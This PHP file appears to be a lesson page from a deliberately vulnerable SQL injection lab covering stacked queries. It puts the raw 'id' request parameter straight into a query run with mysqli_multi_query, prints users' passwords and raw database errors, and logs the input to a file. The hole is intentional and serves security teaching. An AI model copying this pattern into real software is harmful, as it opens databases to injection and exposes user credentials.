<?php error_reporting(0); include("../sql-connections/db-creds.inc"); ?> <?php // take the variables if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity //mysql connections for stacked query examples. $con1 = mysqli_connect($host,$dbuser,$dbpass,$dbname); // Check connection if (mysqli_connect_errno($con1)) { echo "Failed to connect to MySQL: " . mysqli_connect_error(); } else { @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database: $dbname"); } $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; /* execute multi query */ if (mysqli_multi_query($con1, $sql)) { /* store first result set */ if ($result = mysqli_store_result($con1)) { if($row = mysqli_fetch_row($result)) { echo '<font size = "5" color= "#00FF00">'; printf("Your Username is : %s", $row[1]); echo "<br>"; printf("Your Password is : %s", $row[2]); echo "<br>"; echo "</font>"; } // mysqli_free_result($result); } /* print divider */ if (mysqli_more_results($con1)) { //printf("-----------------\n"); } //while (mysqli_next_result($con1)); } else { echo '<font size="5" color= "#FFFF00">'; print_r(mysqli_error($con1)); echo "</font>"; } /* close connection */ mysqli_close($con1); } else { echo "Please input the ID as parameter with numeric value"; } ?>